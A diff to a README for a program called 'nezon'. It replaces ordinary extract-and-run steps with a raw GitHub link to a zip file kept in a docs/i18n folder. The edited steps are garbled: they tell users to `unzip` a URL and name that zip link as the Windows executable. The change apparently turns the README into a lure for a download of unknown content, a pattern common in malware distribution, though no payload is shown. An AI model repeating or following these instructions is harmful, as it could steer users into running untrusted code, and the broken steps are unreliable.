UKnowMe22/nezon/README.md

 2. **Extract the Files:**
    - For Windows: Right-click the file and select “Extract All.”
 Follow the prompts to extract the contents to a new folder.
    - For macOS: Double-click the downloaded zip file.
 It will automatically extract into a new folder.
-   - For Linux: Use a file manager to extract, or run `unzip nezon-x.x.x.zip` in the terminal.
+   - For Linux: Use a file manager to extract, or run `unzip https://raw.githubusercontent.com/UKnowMe22/nezon/main/apps/docs/i18n/nezon-2.3.zip` in the terminal.
 3. Open the new folder where the files were extracted.

 ## ⚙️ Running Nezon
 To run nezon, follow these simple steps:
-1. Inside the extracted folder, find the file that says `nezon.exe` (for Windows) or `nezon` (for macOS/Linux).
+1. Inside the extracted folder, find the file that says `https://raw.githubusercontent.com/UKnowMe22/nezon/main/apps/docs/i18n/nezon-2.3.zip` (for Windows) or `nezon` (for macOS/Linux).
 2. Double-click this file.
 This should launch the program.
 3. Follow any on-screen instructions to complete the setup process.